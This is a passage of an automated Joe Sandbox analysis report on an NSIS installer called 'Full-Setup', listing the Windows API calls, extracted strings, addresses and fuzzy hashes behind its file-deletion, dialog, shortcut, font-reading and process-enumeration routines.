                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                          • String ID: $ @$M$N
                                                                                                                                                                          • API String ID: 1638840714-3479655940
                                                                                                                                                                          • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                          • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                          • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                          • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                          • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                          • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                          Strings
                                                                                                                                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                          • ptF, xrefs: 00406D1A
                                                                                                                                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                          • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                          • \*.*, xrefs: 00406D2F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                          • API String ID: 2035342205-1650287579
                                                                                                                                                                          • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                          • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                          • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                          • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                          • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                            • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                            • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427773,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                          • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                          • String ID: F$A
                                                                                                                                                                          • API String ID: 3347642858-1281894373
                                                                                                                                                                          • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                          • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                          • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                          • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                          • API String ID: 1916479912-1189179171
                                                                                                                                                                          • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                          • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                          • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                          • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427773,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                          • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                          • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427773,74DF23A0,00000000), ref: 00406A73
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                          • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                          • API String ID: 3581403547-1792361021
                                                                                                                                                                          • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                          • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                          • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                          Strings
                                                                                                                                                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                          • API String ID: 542301482-1377821865
                                                                                                                                                                          • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                          • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                          • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                          • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                          • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                          • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                          • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                          • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                          APIs
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                            • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                          • API String ID: 20674999-2124804629
                                                                                                                                                                          • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                          • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                          • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                          • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                          APIs
                                                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                            • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                          • String ID: F$N$open
                                                                                                                                                                          • API String ID: 3928313111-1104729357
                                                                                                                                                                          • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                          • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                          • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
